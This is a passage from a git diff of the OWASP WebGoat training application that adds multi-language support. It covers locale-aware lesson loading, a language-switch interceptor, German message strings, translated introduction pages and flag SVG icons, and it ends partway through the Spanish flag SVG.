@@ -68,10 +70,13 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
 
     private static final Asciidoctor asciidoctor = create();
     private static final String PREFIX = "doc:";
+
+    private final Language language;
     private final ResourceLoader resourceLoader;
 
-    public AsciiDoctorTemplateResolver(ResourceLoader resourceLoader) {
+    public AsciiDoctorTemplateResolver(Language language, ResourceLoader resourceLoader) {
         this.resourceLoader = resourceLoader;
+        this.language = language;
         setResolvablePatterns(Set.of(PREFIX + "*"));
     }
 
@@ -79,7 +84,7 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
     protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
         var templateName = resourceName.substring(PREFIX.length());
 
-        try (InputStream is = resourceLoader.getResource("classpath:/" + templateName).getInputStream()) {
+        try (InputStream is = getInputStream(templateName)) {
             JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
             extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
             extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
@@ -96,10 +101,26 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
         }
     }
 
+    private InputStream getInputStream(String templateName) throws IOException {
+        if (resourceLoader.getResource("classpath:/" + computeResourceName(templateName, language.getLocale().getLanguage())).isFile()) {
+            return resourceLoader.getResource("classpath:/" + computeResourceName(templateName, language.getLocale().getLanguage())).getInputStream();
+        } else {
+            return resourceLoader.getResource("classpath:/" + templateName).getInputStream();
+        }
+    }
+    private String computeResourceName(String resourceName, String language) {
+        if (language.equals("en")) {
+            return resourceName;
+        } else {
+            return resourceName.replace(".adoc", "_".concat(language).concat(".adoc"));
+        }
+    }
+
     private Map<String, Object> createAttributes() {
         Map<String, Object> attributes = new HashMap<>();
         attributes.put("source-highlighter", "coderay");
         attributes.put("backend", "xhtml");
+        attributes.put("lang", determineLanguage());
         attributes.put("icons", org.asciidoctor.Attributes.FONT_ICONS);
 
         Map<String, Object> options = new HashMap<>();
@@ -107,4 +128,20 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
 
         return options;
     }
+
+    private String determineLanguage() {
+        HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
+
+        Locale browserLocale = (Locale) request.getSession().getAttribute(SessionLocaleResolver.LOCALE_SESSION_ATTRIBUTE_NAME);
+        if (null != browserLocale) {
+            return browserLocale.getLanguage();
+        } else {
+            String langHeader = request.getHeader(Headers.ACCEPT_LANGUAGE_STRING);
+            if (null != langHeader) {
+                return langHeader.substring(0,2);
+            } else {
+                return "en";
+            }
+        }
+    }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
index 182fbffbe..69641a8e4 100644
--- a/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
@@ -44,9 +44,11 @@ import org.springframework.core.io.ResourceLoader;
 import org.springframework.core.io.support.ResourcePatternResolver;
 import org.springframework.web.servlet.LocaleResolver;
 import org.springframework.web.servlet.ViewResolver;
+import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
 import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
 import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
 import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
+import org.springframework.web.servlet.i18n.LocaleChangeInterceptor;
 import org.springframework.web.servlet.i18n.SessionLocaleResolver;
 import org.thymeleaf.IEngineConfiguration;
 import org.thymeleaf.extras.springsecurity5.dialect.SpringSecurityDialect;
@@ -143,8 +145,8 @@ public class MvcConfiguration implements WebMvcConfigurer {
      * Loads the lesson asciidoc.
      */
     @Bean
-    public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(ResourceLoader resourceLoader) {
-        AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(resourceLoader);
+    public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(Language language, ResourceLoader resourceLoader) {
+        AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(language, resourceLoader);
         resolver.setCacheable(false);
         resolver.setOrder(1);
         resolver.setCharacterEncoding(UTF8);
@@ -196,6 +198,24 @@ public class MvcConfiguration implements WebMvcConfigurer {
         return new Language(localeResolver);
     }
 
+    @Bean
+    public LocaleResolver localeResolver() {
+        SessionLocaleResolver localeResolver = new SessionLocaleResolver();
+        return localeResolver;
+    }
+
+    @Bean
+    public LocaleChangeInterceptor localeChangeInterceptor() {
+        LocaleChangeInterceptor lci = new LocaleChangeInterceptor();
+        lci.setParamName("lang");
+        return lci;
+    }
+
+    @Override
+    public void addInterceptors(InterceptorRegistry registry) {
+        registry.addInterceptor(localeChangeInterceptor());
+    }
+
     @Bean
     public Messages messageSource(Language language) {
         Messages messages = new Messages(language);
@@ -205,11 +225,6 @@ public class MvcConfiguration implements WebMvcConfigurer {
         return messages;
     }
 
-    @Bean
-    public LocaleResolver localeResolver() {
-        return new SessionLocaleResolver();
-    }
-
     @Bean
     public LabelDebugger labelDebugger() {
         return new LabelDebugger();
diff --git a/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java b/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
index aabcd257c..0339adc35 100644
--- a/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
+++ b/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
@@ -31,6 +31,7 @@
 package org.owasp.webgoat.container;
 
 import lombok.AllArgsConstructor;
+import org.owasp.webgoat.container.i18n.Language;
 import org.owasp.webgoat.container.users.UserService;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.context.annotation.Bean;
@@ -43,6 +44,7 @@ import org.springframework.security.config.annotation.web.configuration.WebSecur
 import org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer;
 import org.springframework.security.core.userdetails.UserDetailsService;
 import org.springframework.security.crypto.password.NoOpPasswordEncoder;
+import org.springframework.web.servlet.i18n.SessionLocaleResolver;
 
 /**
  * Security configuration for WebGoat.
diff --git a/src/main/java/org/owasp/webgoat/container/i18n/Language.java b/src/main/java/org/owasp/webgoat/container/i18n/Language.java
index 96a039979..5b73e0755 100644
--- a/src/main/java/org/owasp/webgoat/container/i18n/Language.java
+++ b/src/main/java/org/owasp/webgoat/container/i18n/Language.java
@@ -29,7 +29,6 @@ import lombok.AllArgsConstructor;
 import org.springframework.web.context.request.RequestContextHolder;
 import org.springframework.web.context.request.ServletRequestAttributes;
 import org.springframework.web.servlet.LocaleResolver;
-
 import java.util.Locale;
 
 /**
@@ -47,5 +46,4 @@ public class Language {
     public Locale getLocale() {
         return localeResolver.resolveLocale(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());
     }
-
 }
diff --git a/src/main/resources/i18n/messages_de.properties b/src/main/resources/i18n/messages_de.properties
index 3cb246153..13a8b1f2f 100644
--- a/src/main/resources/i18n/messages_de.properties
+++ b/src/main/resources/i18n/messages_de.properties
@@ -25,8 +25,17 @@
 
 #General
 lesson.completed=Herzlichen Gl\u00fcckwunsch! Sie haben diese Lektion erfolgreich abgeschlossen.
-RestartLesson=Lektion neu beginnen
+assignment.solved=Herzlichen Gl\u00fcckwunsch! Sie haben diesen Auftrag erfolgreich abgeschlossen.
+assignment.not.solved=Die L\u00f6sung ist nicht korrekt, versuchen Sie es erneut.
+
+reset.lesson=Lektion neu anfangen
 SolutionVideos=L\u00f6sungsvideos
 ErrorGenerating=Fehler beim Generieren von
 InvalidData=Ung\u00fcltige Daten
 Go!=Los gehts!
+username=Benutzername
+password=Passwort
+password.confirm=Wiederhohl Passwort
+sign.up=Anmelden
+register.title=Registrieren 
+
diff --git a/src/main/resources/lessons/cryptography/documentation/Crypto_plan.adoc b/src/main/resources/lessons/cryptography/documentation/Crypto_plan.adoc
index 78af04907..39ce0b5c0 100644
--- a/src/main/resources/lessons/cryptography/documentation/Crypto_plan.adoc
+++ b/src/main/resources/lessons/cryptography/documentation/Crypto_plan.adoc
@@ -2,7 +2,13 @@
  
 == Concept 
 
-This lesson explains different types of cryptography techniques that are commonly used in web applications. 
+ifeval::["{lang}" == "nl"]
+Deze les behandelt verschillende cryptografische technieken die voorkomen in webapplicaties.
+endif::[]
+
+ifeval::["{lang}" != "nl"]
+This lesson explains different types of cryptography techniques that are commonly used in web applications.
+endif::[]
 
 == Goals
 
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc
index 3a2e66421..f6eae592f 100644
--- a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc
+++ b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc
@@ -1,6 +1,8 @@
 == What is WebGoat?
 ---
 
+Welcome `username:user[]`!
+
 WebGoat is a deliberately insecure application that allows interested developers just like you to _test vulnerabilities_
 commonly found in Java-based applications that use common and popular open source components.
 
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_de.adoc b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_de.adoc
new file mode 100644
index 000000000..c2927e637
--- /dev/null
+++ b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_de.adoc
@@ -0,0 +1,18 @@
+== Was ist WebGoat?
+---
+
+WebGoat ist eine Anwendung, die verschiedene Schwachstellen aus den OWASP Top 10 erklärt und testet.
+
+Es enthält Lektionen, Übungen und Herausforderungen (Challenges). Die Lektionen sind in verschiedene Kategorien unterteilt und enthalten Seiten mit Informationen und Übungen. Sie sollten die Herausforderungen zuletzt versuchen. Diese sind knifflig und enthalten keine Hinweise.
+
+Ziel von WebGoat ist es, alles rund um das Thema Websicherheit spielerisch zu lernen und zu erleben. Dies ist sowohl für Entwickler als auch für Tester geeignet.
+
+Fühlen Sie sich frei, WebGoat einem gründlichen Test zu unterziehen und Ihre Kenntnisse und Erfahrungen in diesem Bereich zu verbessern.
+
+Sie sollten versuchen, die WebGoat-Anwendungsübungen mit einer Hacking-Mentalität zu lösen.
+
+Danke für dein Interesse!
+
+*Das WebGoat-Team*
+
+#Die meisten Texte sind auf Englisch. Sie können die Sprache über das Dropdown im Menü wechseln. Sie sind auch herzlich eingeladen, Texte zu übersetzen um WebGoat zu verbesseren.#
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc
new file mode 100644
index 000000000..813065645
--- /dev/null
+++ b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc
@@ -0,0 +1,18 @@
+== Qu'est-ce que WebGoat
+---
+
+WebGoat est une application qui explique et teste diverses vulnérabilités du top 10 OWASP.
+
+Il contient des leçons, des exercices et des défis (Challenges). Les leçons sont divisées en plusieurs catégories et contiennent des pages contenant des informations et des exercices. Vous devriez essayer les défis en dernier. Ceux-ci sont délicats et ne contiennent aucun indice.
+
+Le but de WebGoat est d'apprendre et de tout expérimenter de manière ludique dans le domaine de la sécurité Web. Cela convient à la fois aux développeurs et aux testeurs.
+
+N'hésitez pas à faire passer un test approfondi à WebGoat et à améliorer vos connaissances et votre expérience dans ce domaine.
+
+Vous devriez essayer de résoudre les exercices d'application WebGoat avec un état d'esprit de piratage.
+
+Merci pour ton intérêt!
+
+*L'équipe WebGoat*
+
+#La plupart des textes sont en anglais. Vous pouvez changer de langue via la liste déroulante du menu. Vous êtes également cordialement invité à traduire des textes pour améliorer WebGoat.#
diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_nl.adoc b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_nl.adoc
new file mode 100644
index 000000000..702986c6f
--- /dev/null
+++ b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_nl.adoc
@@ -0,0 +1,18 @@
+== Wat is WebGoat?
+---
+
+WebGoat is een applicatie die verschillende kwetsbaarheden uit de OWASP top 10 uitlegt en laat uittesten.
+
+Het bevat lessen, oefeningen en uitdagingen (de challenges). De lessen zijn onderverdeeld in een aantal categorien en daarin staan pagina's met informatie en oefeningen. De challenges moet je als laatste uitproberen. Deze zijn lastig en bevatten geen hints.
+
+De opzet van WebGoat is om spelenderwijs alles te leren en te ervaren op het gebied van web security. Dit is geschikt voor zowel ontwikkelaars als testers.
+
+Voel je vrij om WebGoat eens flink uit te testen en je kennis en ervaring op dit gebied te verbeteren.
+
+Je moet met een hacking mindset proberen de WebGoat applicatie oefeningen op te lossen.
+
+Bedankt voor je interesse!
+
+*Het team van WebGoat*
+
+#De meeste tekst is in het Engels. U kunt van taal wisselen via de dropdown in het menu. U bent ook van harte uitgenodigd om teksten te vertalen om WebGoat te verbeteren.#
diff --git a/src/main/resources/webgoat/static/css/img/cnlang.svg b/src/main/resources/webgoat/static/css/img/cnlang.svg
new file mode 100644
index 000000000..7f27dae03
--- /dev/null
+++ b/src/main/resources/webgoat/static/css/img/cnlang.svg
@@ -0,0 +1,11 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="flag-icons-cn" viewBox="0 0 512 512">
+  <defs>
+    <path id="a" fill="#ff0" d="M1-.3-.7.8 0-1 .6.8-1-.3z"/>
+  </defs>
+  <path fill="#ee1c25" d="M0 0h512v512H0z"/>
+  <use xlink:href="#a" width="30" height="20" transform="matrix(76.8 0 0 76.8 128 128)"/>
+  <use xlink:href="#a" width="30" height="20" transform="rotate(-121 142.6 -47) scale(25.5827)"/>
+  <use xlink:href="#a" width="30" height="20" transform="rotate(-98.1 198 -82) scale(25.6)"/>
+  <use xlink:href="#a" width="30" height="20" transform="rotate(-74 272.4 -114) scale(25.6137)"/>
+  <use xlink:href="#a" width="30" height="20" transform="matrix(16 -19.968 19.968 16 256 230.4)"/>
+</svg>
diff --git a/src/main/resources/webgoat/static/css/img/delang.svg b/src/main/resources/webgoat/static/css/img/delang.svg
new file mode 100644
index 000000000..ccb5ff126
--- /dev/null
+++ b/src/main/resources/webgoat/static/css/img/delang.svg
@@ -0,0 +1,5 @@
+<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-de" viewBox="0 0 512 512">
+  <path fill="#ffce00" d="M0 341.3h512V512H0z"/>
+  <path d="M0 0h512v170.7H0z"/>
+  <path fill="#d00" d="M0 170.7h512v170.6H0z"/>
+</svg>
diff --git a/src/main/resources/webgoat/static/css/img/enlang.svg b/src/main/resources/webgoat/static/css/img/enlang.svg
new file mode 100644
index 000000000..b261273ec
--- /dev/null
+++ b/src/main/resources/webgoat/static/css/img/enlang.svg
@@ -0,0 +1,7 @@
+<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-gb" viewBox="0 0 512 512">
+  <path fill="#012169" d="M0 0h512v512H0z"/>
+  <path fill="#FFF" d="M512 0v64L322 256l190 187v69h-67L254 324 68 512H0v-68l186-187L0 74V0h62l192 188L440 0z"/>
+  <path fill="#C8102E" d="m184 324 11 34L42 512H0v-3l184-185zm124-12 54 8 150 147v45L308 312zM512 0 320 196l-4-44L466 0h46zM0 1l193 189-59-8L0 49V1z"/>
+  <path fill="#FFF" d="M176 0v512h160V0H176zM0 176v160h512V176H0z"/>
+  <path fill="#C8102E" d="M0 208v96h512v-96H0zM208 0v512h96V0h-96z"/>
+</svg>
diff --git a/src/main/resources/webgoat/static/css/img/eslang.svg b/src/main/resources/webgoat/static/css/img/eslang.svg
new file mode 100644
index 000000000..f9c9b4b32
--- /dev/null
+++ b/src/main/resources/webgoat/static/css/img/eslang.svg
@@ -0,0 +1,547 @@
+<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-es" viewBox="0 0 512 512">
+  <path fill="#AA151B" d="M0 0h512v512H0z"/>
+  <path fill="#F1BF00" d="M0 128h512v256H0z"/>
+  <path fill="#ad1519" d="M171.7 227.6s-.5 0-.8-.2a12.1 12.1 0 0 1-1.1-1l-.7-.5-.7-.9s-.7-1.2-.4-2c.4-1 1-1.3 1.5-1.6.5-.3 1.6-.6 1.6-.6l1.2-.5 1.3-.3.6-.3.9-.1 1.1-.3 1.7.1h5.1a41 41 0 0 0 3.6 1.2c.6.1 1.9.3 2.4.6.6.3 1 .8 1.3 1.1.3.4.3.8.4 1.1v1.1l-.5.9-.6 1-.8.7s-.6.5-1.1.5c-.5 0-5.1-.9-8.2-.9-3 0-7.8.9-7.8.9"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="M171.7 227.6s-.5 0-.8-.2a12.1 12.1 0 0 1-1.1-1l-.7-.5-.7-.9s-.7-1.2-.4-2c.4-1 1-1.3 1.5-1.6.5-.3 1.6-.6 1.6-.6l1.2-.5 1.3-.3.6-.3.9-.1 1.1-.3 1.7.1h5.1a41 41 0 0 0 3.6 1.2c.6.1 1.9.3 2.4.6.6.3 1 .8 1.3 1.1.3.4.3.8.4 1.1v1.1l-.5.9-.6 1-.8.7s-.6.5-1.1.5c-.5 0-5.1-.9-8.2-.9-3 0-7.8.9-7.8.9z"/>
+  <path fill="#c8b100" d="M178.2 220.9c0-1.5.6-2.6 1.4-2.6.8 0 1.4 1.1 1.4 2.6 0 1.4-.6 2.5-1.4 2.5-.8 0-1.4-1.1-1.4-2.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M178.2 220.9c0-1.5.6-2.6 1.4-2.6.8 0 1.4 1.1 1.4 2.6 0 1.4-.6 2.5-1.4 2.5-.8 0-1.4-1.1-1.4-2.5z"/>
+  <path fill="#c8b100" d="M179 220.9c0-1.3.3-2.4.6-2.4.4 0 .7 1 .7 2.4 0 1.3-.3 2.3-.7 2.3-.3 0-.6-1-.6-2.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M179 220.9c0-1.3.3-2.4.6-2.4.4 0 .7 1 .7 2.4 0 1.3-.3 2.3-.7 2.3-.3 0-.6-1-.6-2.3z"/>
+  <path fill="#c8b100" d="M178.7 218.2c0-.5.4-1 .9-1s1 .5 1 1-.5.9-1 .9a1 1 0 0 1-1-1"/>
+  <path fill="#c8b100" d="M180.3 217.8v.6h-1.5v-.6h.5v-1.3h-.7v-.6h.7v-.6h.6v.6h.6v.6h-.6v1.3h.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M180.3 217.8v.6h-1.5v-.6h.5v-1.3h-.7v-.6h.7v-.6h.6v.6h.6v.6h-.6v1.3h.4"/>
+  <path fill="#c8b100" d="M181 217.8v.6h-2.7v-.6h1v-1.3h-.7v-.6h.7v-.6h.6v.6h.6v.6h-.6v1.3h1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M181 217.8v.6h-2.7v-.6h1v-1.3h-.7v-.6h.7v-.6h.6v.6h.6v.6h-.6v1.3h1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M179.9 217.3a.9.9 0 0 1 .6.9c0 .5-.4.9-.9.9s-1-.4-1-1c0-.3.4-.7.8-.8"/>
+  <path fill="#c8b100" d="M179.6 227.4h-5v-1.2l-.3-1.2-.2-1.6c-1.4-1.8-2.6-3-3-2.7 0-.4.2-.6.4-.8 1.2-.7 3.7 1 5.6 3.9l.5.7h4l.5-.7c1.9-2.9 4.4-4.6 5.6-3.9.2.2.4.4.5.8-.5-.3-1.7.9-3 2.7l-.3 1.6-.2 1.2-.1 1.2h-5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M179.6 227.4h-5v-1.2l-.3-1.2-.2-1.6c-1.4-1.8-2.6-3-3-2.7 0-.4.2-.6.4-.8 1.2-.7 3.7 1 5.6 3.9l.5.7h4l.5-.7c1.9-2.9 4.4-4.6 5.6-3.9.2.2.4.4.5.8-.5-.3-1.7.9-3 2.7l-.3 1.6-.2 1.2-.1 1.2h-5z"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M171.3 220.6c1-.5 3 1.2 4.8 3.8m11.9-3.8c-1-.5-3.1 1.2-4.9 3.8"/>
+  <path fill="#c8b100" d="M172.3 229.6a4.8 4.8 0 0 0-.6-1c2-.7 4.8-1 7.9-1 3 0 5.9.3 7.9 1l-.6.9-.3.8c-1.8-.6-4.2-.8-7-.8-2.9 0-5.6.3-7 .8l-.3-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M172.3 229.6a4.8 4.8 0 0 0-.6-1c2-.7 4.8-1 7.9-1 3 0 5.9.3 7.9 1l-.6.9-.3.8c-1.8-.6-4.2-.8-7-.8-2.9 0-5.6.3-7 .8l-.3-.7"/>
+  <path fill="#c8b100" d="M179.6 232.2a27 27 0 0 0 6.2-.7c.7-.2 1.1-.5 1-.8 0-.2-.1-.3-.3-.4a25.8 25.8 0 0 0-7-.9c-2.6 0-5.3.4-6.8.9-.2 0-.3.2-.4.4 0 .3.4.6 1 .8 1 .3 3.8.7 6.3.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M179.6 232.2a27 27 0 0 0 6.2-.7c.7-.2 1.1-.5 1-.8 0-.2-.1-.3-.3-.4a25.8 25.8 0 0 0-7-.9c-2.6 0-5.3.4-6.8.9-.2 0-.3.2-.4.4 0 .3.4.6 1 .8 1 .3 3.8.7 6.3.7z"/>
+  <path fill="#c8b100" d="m187.6 227.4-.6-.5s-.6.3-1.3.2c-.7-.1-1-1-1-1s-.8.7-1.5.6c-.6 0-1-.6-1-.6s-.8.5-1.4.5c-.7 0-1.3-.9-1.3-.9s-.6.9-1.2 1c-.7 0-1.2-.6-1.2-.6s-.3.6-1 .7c-.9.1-1.6-.6-1.6-.6s-.5.7-1 1c-.6.1-1.3-.4-1.3-.4l-.2.5-.3.2.2.4a32.5 32.5 0 0 1 15.5.1l.2-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m187.6 227.4-.6-.5s-.6.3-1.3.2c-.7-.1-1-1-1-1s-.8.7-1.5.6c-.6 0-1-.6-1-.6s-.8.5-1.4.5c-.7 0-1.3-.9-1.3-.9s-.6.9-1.2 1c-.7 0-1.2-.6-1.2-.6s-.3.6-1 .7c-.9.1-1.6-.6-1.6-.6s-.5.7-1 1c-.6.1-1.3-.4-1.3-.4l-.2.5-.3.2.2.4a32.5 32.5 0 0 1 15.5.1l.2-.6z"/>
+  <path fill="#c8b100" d="M179.6 224.8h.3a1.1 1.1 0 0 0 1 1.5c.6 0 1-.3 1.2-.8l.1-.4v.5c.1.5.6.9 1.2.9a1.1 1.1 0 0 0 1.1-1.1v-.1l.4-.4.2.4a1 1 0 0 0-.1.5c0 .6.5 1 1 1 .4 0 .8-.1 1-.4l.2-.3v.4c0 .3.2.6.5.7 0 0 .4 0 1-.4l.8-.8v.5s-.5.8-1 1.1l-1 .3c-.3-.1-.5-.4-.7-.7a1.6 1.6 0 0 1-.8.3c-.6 0-1.2-.4-1.4-1a1.6 1.6 0 0 1-1.2.6 2 2 0 0 1-1.3-.6 1.6 1.6 0 0 1-1.1.4c-.6 0-1.1-.3-1.4-.7-.3.4-.8.7-1.4.7a1.6 1.6 0 0 1-1-.4c-.4.3-.9.6-1.4.6a1.6 1.6 0 0 1-1.2-.5c-.2.5-.8.8-1.4.8-.3 0-.6 0-.8-.2-.1.3-.4.6-.7.7a2 2 0 0 1-1-.3 4.4 4.4 0 0 1-1-1.1v-.5l.9.8c.5.4.9.4.9.4.4 0 .5-.4.5-.7v-.4l.2.3c.2.3.6.5 1 .5.5 0 1-.5 1-1a1 1 0 0 0 0-.6l.1-.4.4.4c0 .7.5 1.2 1 1.2.7 0 1.2-.4 1.2-1v-.3l.2.3c.2.5.6.8 1.1.8.7 0 1.2-.5 1.2-1.1a1 1 0 0 0-.1-.4h.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M179.6 224.8h.3a1.1 1.1 0 0 0 1 1.5c.6 0 1-.3 1.2-.8l.1-.4v.5c.1.5.6.9 1.2.9a1.1 1.1 0 0 0 1.1-1.1v-.1l.4-.4.2.4a1 1 0 0 0-.1.5c0 .6.5 1 1 1 .4 0 .8-.1 1-.4l.2-.3v.4c0 .3.2.6.5.7 0 0 .4 0 1-.4l.8-.8v.5s-.5.8-1 1.1l-1 .3c-.3-.1-.5-.4-.7-.7a1.6 1.6 0 0 1-.8.3c-.6 0-1.2-.4-1.4-1a1.6 1.6 0 0 1-1.2.6 2 2 0 0 1-1.3-.6 1.6 1.6 0 0 1-1.1.4c-.6 0-1.1-.3-1.4-.7-.3.4-.8.7-1.4.7a1.6 1.6 0 0 1-1-.4c-.4.3-.9.6-1.4.6a1.6 1.6 0 0 1-1.2-.5c-.2.5-.8.8-1.4.8-.3 0-.6 0-.8-.2-.1.3-.4.6-.7.7a2 2 0 0 1-1-.3 4.4 4.4 0 0 1-1-1.1v-.5l.9.8c.5.4.9.4.9.4.4 0 .5-.4.5-.7v-.4l.2.3c.2.3.6.5 1 .5.5 0 1-.5 1-1a1 1 0 0 0 0-.6l.1-.4.4.4c0 .7.5 1.2 1 1.2.7 0 1.2-.4 1.2-1v-.3l.2.3c.2.5.6.8 1.1.8.7 0 1.2-.5 1.2-1.1a1 1 0 0 0-.1-.4h.3z"/>
+  <path fill="#c8b100" d="M179.6 227.6c-3.1 0-5.9.3-7.9 1l-.3-.2c0-.2 0-.3.2-.4 2-.6 4.8-1 8-1s6 .4 8 1l.2.3c0 .2-.2.3-.3.2-2-.6-4.8-1-8-1"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="M179.6 227.6c-3.1 0-5.9.3-7.9 1l-.3-.2c0-.2 0-.3.2-.4 2-.6 4.8-1 8-1s6 .4 8 1l.2.3c0 .2-.2.3-.3.2-2-.6-4.8-1-8-1z"/>
+  <path fill="#fff" d="M176.6 228.7c0-.3.2-.5.5-.5.2 0 .4.2.4.5 0 .2-.2.4-.5.4s-.4-.2-.4-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M176.6 228.7c0-.3.2-.5.5-.5.2 0 .4.2.4.5 0 .2-.2.4-.5.4s-.4-.2-.4-.4z"/>
+  <path fill="#ad1519" d="M179.6 228.8h-1a.3.3 0 0 1-.3-.3c0-.1.1-.3.3-.3h2a.3.3 0 0 1 .4.3.3.3 0 0 1-.4.3h-1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M179.6 228.8h-1a.3.3 0 0 1-.3-.3c0-.1.1-.3.3-.3h2a.3.3 0 0 1 .4.3.3.3 0 0 1-.4.3h-1"/>
+  <path fill="#058e6e" d="M174.7 229.2h-.7c-.2.1-.4 0-.4-.2a.3.3 0 0 1 .2-.3l.7-.1.8-.2c.2 0 .3.1.4.3 0 .2-.1.3-.3.4h-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M174.7 229.2h-.7c-.2.1-.4 0-.4-.2a.3.3 0 0 1 .2-.3l.7-.1.8-.2c.2 0 .3.1.4.3 0 .2-.1.3-.3.4h-.8"/>
+  <path fill="#ad1519" d="m171.8 229.7.3-.5.7.1-.4.6-.6-.2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m171.8 229.7.3-.5.7.1-.4.6-.6-.2"/>
+  <path fill="#fff" d="M181.7 228.7c0-.3.2-.5.4-.5.3 0 .5.2.5.5 0 .2-.2.4-.5.4s-.4-.2-.4-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M181.7 228.7c0-.3.2-.5.4-.5.3 0 .5.2.5.5 0 .2-.2.4-.5.4s-.4-.2-.4-.4z"/>
+  <path fill="#058e6e" d="M184.5 229.2h.8c.1.1.3 0 .3-.2a.3.3 0 0 0-.2-.3l-.8-.1-.7-.2c-.2 0-.3.1-.4.3 0 .2.1.3.3.4h.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M184.5 229.2h.8c.1.1.3 0 .3-.2a.3.3 0 0 0-.2-.3l-.8-.1-.7-.2c-.2 0-.3.1-.4.3 0 .2.1.3.3.4h.7"/>
+  <path fill="#ad1519" d="m187.3 229.7-.2-.5h-.7l.3.6h.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m187.3 229.7-.2-.5h-.7l.3.6h.7"/>
+  <path fill="#ad1519" d="M179.6 231.6c-2.5 0-4.8-.2-6.5-.7a27.2 27.2 0 0 1 6.5-.7c2.5 0 4.7.3 6.5.7-1.8.5-4 .7-6.5.7"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="M179.6 231.6c-2.5 0-4.8-.2-6.5-.7a27.2 27.2 0 0 1 6.5-.7c2.5 0 4.7.3 6.5.7-1.8.5-4 .7-6.5.7z"/>
+  <path fill="#c8b100" d="M187.4 226.2c.1-.2 0-.4 0-.4-.2 0-.4 0-.5.2 0 .2 0 .4.2.5.1 0 .3-.1.3-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M187.4 226.2c.1-.2 0-.4 0-.4-.2 0-.4 0-.5.2 0 .2 0 .4.2.5.1 0 .3-.1.3-.3z"/>
+  <path fill="#c8b100" d="M182.5 225.2c0-.2 0-.3-.2-.4-.2 0-.3.2-.3.4s0 .3.2.4c.1 0 .3-.2.3-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M182.5 225.2c0-.2 0-.3-.2-.4-.2 0-.3.2-.3.4s0 .3.2.4c.1 0 .3-.2.3-.4z"/>
+  <path fill="#c8b100" d="M176.7 225.2c0-.2 0-.3.2-.4.2 0 .3.2.3.4s0 .3-.2.4l-.3-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M176.7 225.2c0-.2 0-.3.2-.4.2 0 .3.2.3.4s0 .3-.2.4l-.3-.4z"/>
